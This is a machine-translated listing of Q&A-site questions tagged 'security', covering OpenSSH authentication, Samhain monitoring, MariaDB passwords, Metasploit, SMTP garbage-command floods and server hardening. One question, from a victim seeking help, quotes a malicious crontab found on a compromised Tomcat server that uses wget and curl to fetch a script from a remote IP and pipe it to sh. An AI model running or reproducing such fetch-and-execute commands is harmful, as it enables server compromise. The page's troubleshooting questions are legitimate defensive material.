タグ付けされた質問 「security」

セキュリティは製品ではなく、プロセスです。

2
OpenSSHのユーザーごとの認証方法を設定するにはどうすればよいですか?
1セットのユーザーが公開鍵認証を使用して認証し、他のユーザーがパスワード認証を使用できるようにしたいと考えています。 LinuxのOpenSSHでこれは可能ですか?もしそうなら、私はそれについてどうやって行くのですか? を確認したところ/etc/ssh/sshd_config、キー認証の有効化またはPAMの使用に制限されているようです。
9 linux  security  ssh 

1
Samhainは、存在しないが将来的には存在する可能性のあるファイルを監視できますか?
たとえば、Samhainにファイルを監視してもらいたい/root/somefile。このファイルは現在存在しませんが、作成されたときに通知を受け取ります。 私はこれを追加しsamhainrcます: [ReadOnly] file = /root/somefile これにより、Samhainは次のログエントリを発行します。 Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT : [2018-10-18T22:54:04+0000] interface=<lstat>, msg=<No such file or directory>, userid=<0>, path=</root/somefile> Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT : [2018-10-18T22:54:04+0000] msg=<POLICY MISSING>, path=</root/somefile> Oct 18 22:54:19 ip-172-31-24-115 Samhain[17157]: INFO : [2018-10-18T22:54:19+0000] msg=<Checking [ReadOnly]>, path=</root/somefile> Oct 18 22:54:19 ip-172-31-24-115 Samhain[17157]: …

1
ログオン認証のために特定のユーザーまたはOUを特定のDCにポイントする
ユーザー数は約200人です。 50はアジアにあり、50は南および東ヨーロッパにあり、約100は西ヨーロッパにあります。 私は、アジアにいる50人のユーザーにアジアのDCをポイントしたいと思います。現在、ヨーロッパのサーバーに対して認証を行っているため、そのために大幅な遅延が発生しているようです。 これを引き起こしているのは何ですか?または私の問題を解決するのは何ですか?

3
不明な起源のcronを介したApacheサーバーへのシェルスクリプト攻撃
Apache tomcatサーバーでプロジェクト戦争を実行しているときに、サーバーが危険にさらされていることがわかりました。 未知の世界で戦争をしている間、cronこんな風に走っています [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh ダウンロードは、logo.jpgマルウェアをダウンロードされたシェルスクリプトを持っています。 以下のこのウェブサイトで同様の問題を見つけました https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/ そして /security/160068/kworker34-malware-on-linux 私のコード全体でこのcronスケジューラの起源を見つけることができません。 誰かがこの問題に直面していることを知りたいのですか?コードでスケジューラの起源を見つけるにはどうすればよいですか。 注意: JAVA(Struts 2)+ jsp + javascript + jquery Webプロジェクトに取り組んでいます。 このスケジューラは、プロジェクトのwarファイルでTomcatを起動するたびに実行されますが、コード内にスケジューラのスケジューラを見つけることができません。 ログファイルで次の行を見つけました [INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - …

1
Windowsログに特定のイベントが表示されたときに通知を受け取る簡単なソリューション[終了]
閉まっている。この質問はトピックから外れています。現在、回答を受け付けていません。 この質問を改善してみませんか? サーバー障害のトピックになるように質問を更新します。 3年前休業。 特定のイベントがWindowsログに表示されたときに通知を取得する最も簡単な方法は何ですか-Windowsネットワーク上の任意の場所。

2
MariaDbの管理者パスワードが機能していないようです
私はMariaDb新しいUbuntu Gnomeにインストールし、その後mysql_secure_installationを実行して、まともな管理者パスワードを設定し、匿名ユーザーを削除しました。 その後、私は管理者パスワードに関するいくつかの奇妙な動作に気づきました: コマンドmysql -u root -pを使用して通常のユーザーアカウントからログインしようとすると、常にエラーが発生します。前にmysql_secure_installationでERROR 1698 (28000): Access denied for user 'root'@'localhost' 設定した正しいパスワードを入力したと確信しています... を使用してrootからコマンドを実行すると、sudo mysql -u root -p実際に入力したパスワードに関係なく、常にデータベースにアクセスできます... これは正常な動作ですか、何か問題がありますか、それともインストールをなんとかしてしまいましたか?

2
Metasploit:モジュールデータベースキャッシュはまだ構築されていません。スローサーチを使用しています
kalilinux 2016の新しいメタスプロイト(最新の安定版) systemctl start postgresql OK msfconsoleの場合 msf > db_status [*] postgresql connected to msf 検索を開始したとき msf > search samba [!] Module database cache not built yet, using slow search だから私はキャッシュを再構築します... msf > db_rebuild_cache そして、検索を開始すると msf > search samba [!] Module database cache not built yet, using slow search この問題を解決するにはどうすればよいですか?
8 linux  security 

2
ローカルアカウントのネットワークログインを無効にする必要があるのはなぜですか?
この質問は、@ SwiftOnSecurityのTwitterスレッドに関連しています:https ://twitter.com/SwiftOnSecurity/status/655208224572882944 スレッドを読んでも、ローカルアカウントのネットワークログインを無効にする理由がわかりません。 だからここに私が考えていることがあります、私が間違っているところを修正してください: DCと複数のクライアントでADをセットアップしているとしましょう。クライアントの1つはジョンです。したがって、朝、ジョンは仕事に取り掛かり、AD資格情報を使用してデスクトップPCにログインします。正午に、ジョンは会議に向かい、自分のコンピューター(Windows + L)を「ロック」します。次に、リモートで(RDPなどを使用して)個人用ラップトップを使用してオフィスのPCに接続する必要があります。しかし、この新しいポリシーを使用すると、彼はそうすることができなくなります。 Securitayの説明によると、パスワードはソルト化されていません。しかし、この場合、攻撃者はどのようにしてアクセスを取得するのですか?パスワードはどちらの側でソルトされていませんか?それとも彼女が言おうとしていることとはまったく無関係なのでしょうか。これが事実である場合、彼女は実際に何を言おうとしていますか?

2
データを認証するようにログアグリゲーターを構成する方法
背景:リモートログ集約は、セキュリティを向上させる方法の1つと見なされています。一般に、これは、システムを侵害する攻撃者がログを編集または削除して、フォレンジック分析を失敗させるリスクに対処します。一般的なログツールのセキュリティオプションを調査しています。 しかし、何かがおかしいと感じます。一般的なリモートロガー(rsyslog、syslog-ng、logstashなど)を構成して、受信メッセージが本当にホストから発信されたものであることを認証する方法がわかりません。なんらかのポリシーの制約がなければ、1つのログ発信者が別のログ発信者に代わってメッセージを偽造する可能性があります。 rsyslogの作者はログデータの認証について警告しているようです: 最後の注意点:transport-tlsは、送信者と受信者の間の接続を保護します。メッセージ自体に存在する攻撃から必ずしも保護するわけではありません。特にリレー環境では、メッセージは悪意のあるシステムから発信された可能性があり、無効なホスト名やその他のコンテンツがそのシステムに配置されています。そのようなものに対するプロビジョニングがない場合、これらのレコードは受信者のリポジトリに表示される可能性があります。-transport-tlsはこれから保護しません(ただし、適切に使用すると役立つ場合があります)。syslog-transport-tlsはホップバイホップのセキュリティを提供することに注意してください。エンドツーエンドのセキュリティは提供されず、メッセージ自体(最後の送信者のみ)は認証されません。 したがって、フォローアップの質問は次のとおりです。ある程度の信頼性を提供する(選択した一般的なログツール-rsyslog、syslog-ng、logstashなどの)良い/実用的な構成は何ですか? または...誰もログデータを認証しない場合は、なぜですか? - (余談:議論/比較では、RFC 5424のいくつかの図や用語を使用すると役立つ場合があります:セクション4.1:配備シナリオの例 -たとえば「発信元」対「リレー」対「コレクター」)

1
不要なサービスの実行を停止することは悪い考えですか
私はdebian専用サーバーを持っています。私はそれを保護しようとしています、そして私が良いと思った一つの方法は、例えばFTPのような必要のないサービスをシャットダウンすることです。 展開時に次のようなものを実行することをお勧めします: service ntp stop update-rc.d -f ntp remove service vsftpd stop update-rc.d -f vsftpd remove service xinetd stop update-rc.d -f xinetd remove 私はこれが初めてです。これを行うことは一般にセキュリティが低いと見なされ、でサービスをロックダウンしますiptablesか、それとも完全に推奨され、最終的にはより安全なサービスを削除しますか?

3
AWSでのキーペアとセキュリティグループの価格?
無料のAWSアカウントの有効期限が切れました。私はすべてのS3やEC2のリソースを削除したが、私は残すことができた場合に放浪していますKey Pairsし、Security Groups彼らのために支払うことなく。(私のアカウントリソースは次のようになります:リソース) Amazonのドキュメントには、この問題についての記述がないようです。 これらのリソースには費用がかかりますか?

3
サブドメイン用に2つ目のワイルドカード証明書を購入する必要がありますか?
のワイルドカード証明書はすでにあり*.mycompany.comます。私たちのネットワークには、内部的にのみ到達可能なホストがあります。それらはすべてinternal.mycompany.comサブドメインに属しています。server.internal.mycompany.comワイルドカード証明書をデプロイしたホスト名のプライベートサーバーがあります。 Webサーバーにアクセスすると、ホスト名の不一致エラーが発生します。本当に別のワイルドカード証明書を取得する*.internal.mycompany.com必要がありますか、それともブラウザーでエラーが発生することなく、すべてのサブドメインとそのサブドメインにワイルドカード証明書を使用する別の(無料!)方法はありますか?

1
ファイルとgitリポジトリを管理するための制限付きシェル
ユーザーがsshを介してファイルとgitリポジトリを管理できるようにするWebホスティング会社について考えてみてください。これも: 安全なコピー(scp) ファイルの作成、コピー、移動/名前変更、および削除 ソース管理とテキスト編集のためのコマンドの狭いサブセットを実行する(git、vim、nano) これを実装して、次のオプションを検討します。 rssh すくすく これらはscp部分を可能にしますが、gitを使用することは不可能のようです。Launchpadにはパッチがありますが、どうすればよいかわかりません。git-shellもありますが、エディターを許可していないようです。vimは多すぎるかもしれません。それは、より多くのコードを実行するために使用できるため、多すぎる場合はそれを(vim、または必要であればテキストエディターを完全に)ドロップできるからです。 基本的にシェルをロックダウンして、ユーザーがファイルとgitリポジトリを管理(および編集)できるようにしますが、ユーザーはシステム上で他のプログラムを実行できないようにする必要があります。最大の問題は、ネットワークとコンピューティングリソースの乱用ですが、システムをプロキシとしても使用します。あなたはそれに名前を付けます。これを行う方法はありますか、それともこの問題に対して間違ったアプローチをしているのでしょうか?
8 linux  security 

2
/ dev / shm&/ proc強化
/ dev / shmと/ procのセキュリティ保護についての言及を見てきましたが、それをどのように行うのか、それが何からなるのか疑問に思っていましたか?これには、/ etc / sysctl.confに何らかの正しい編集が含まれていると思います。 これらのように? kernel.exec-shield = 1 kernel.randomize_va_space = 1

2
SMTP無効コマンド攻撃への対処
セミビジーメールサーバーの1つ(sendmail)には、過去数日間、ガベージコマンドを発行しているホストからの多数の受信接続がありました。 過去2日間: 39,000の一意のIPからの無効なコマンドによる着信SMTP接続 IPは、ブロックできるいくつかのネットワークだけでなく、世界中のさまざまな範囲から取得されます メールサーバーは北米全体のユーザーにサービスを提供しているため、不明なIPからの接続をブロックすることはできません 不正なコマンドの例:http : //pastebin.com/4QUsaTXT この攻撃で誰かが何をしようとしているのかわからないが、私を困らせる。 これが何であるか、それを効果的に扱う方法はありますか?

弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.